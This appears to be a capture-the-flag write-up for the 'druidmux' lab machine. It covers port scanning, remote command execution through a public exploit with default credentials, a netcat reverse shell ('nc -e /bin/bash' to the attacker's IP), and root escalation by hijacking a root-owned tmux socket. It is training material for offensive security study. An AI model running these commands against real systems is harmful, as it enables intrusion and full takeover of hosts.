search

druidmux

#### By b13ss3d ####

There's also a video version available if you prefer visual walkthroughsarrow-up-right.

Port Scanning

We begin our reconnaissance by performing a port scan using Rustscan to identify open ports on the target system.

❯ rustscan -a 10.0.160.67
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

<SNIP>
Open 10.0.160.67:80

After identifying the open ports, we use Nmap to gather more detailed information about the services and their versions running on these ports.

nmap -p80 -sCV -n -Pn -v 10.0.160.67 -oN scan
<SNIP>
Nmap scan report for 10.0.160.67
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)

Nmap command options explained:

  • -p <ports>: scan only a specific port.

  • -sCV: combines the options -sC and -sV.

  • -sC: equivalent to --script=default.

  • -sV: Probe open ports to determine service/version info.

  • -n: Never do DNS resolution.

  • -vvv: Increase verbosity level.

  • -oN <file>: Output scan in normal format.

The scan reveals a web server running on port 80. Let's investigate the website's content using a web browser:

Gaining Initial Access

Using searchsploit, we discover several exploits for this software. One of them allows for remote command execution:

Let's copy this exploit to our current directory:

Now, we'll execute the exploit using default credentials:

After successful execution, we gain the ability to run commands on the target system:

To improve our access, let's obtain a reverse shell. First, set up a listener using netcat:

Then, execute the following command on the target to establish a reverse shell connection nc -e /bin/bash <your IP> <your PORT> like this:

You should receive a connection immediately:

To upgrade this basic shell to a fully interactive terminal, follow these steps:

  1. Execute: script /dev/null -qc bash

  2. Press CTRL + Z

  3. Run: stty raw -echo;fg

  4. Finally, execute: reset xterm and press Enter

Privilege escalation

List the running processes with the command ps -feaw:

We notice that root is executing tmux with the following command: tmux -S /tmp/shareds new -d -s shared /bin/bash -l Let's break down this command:

  1. tmux: The base command to start tmux.

  2. -S /tmp/shareds: Specifies the socket location. In this case, it uses a custom socket in /tmp/shareds instead of the default socket.

  3. new: Indicates that a new session will be created.

  4. -d: This option starts the new session in "detached" mode. This means the session is created but you're not immediately attached to it.

  5. -s shared: Assigns a name to the session. In this case, the session will be called "shared".

  6. /bin/bash -l: This is the command that will run in the new session. In this case, it starts a bash shell with the -l option, which makes it behave like a login shell.

We can exploit this configuration to escalate our privileges. For more information on this technique, refer to the HackTricks resource on tmux session hijackingarrow-up-right.

To gain root access, simply create a new session using the socket utilized by root:

And voila! We now have root privileges:

Flag Locations

The flags can be found in the following locations:

  • /root

  • /etc/passwd

  • /etc/shadow

  • /proc/1/environ

  • http://druidmux/ETSCTF.html

PreviousechoCTF WriteupsNextprisonbreak

Last updated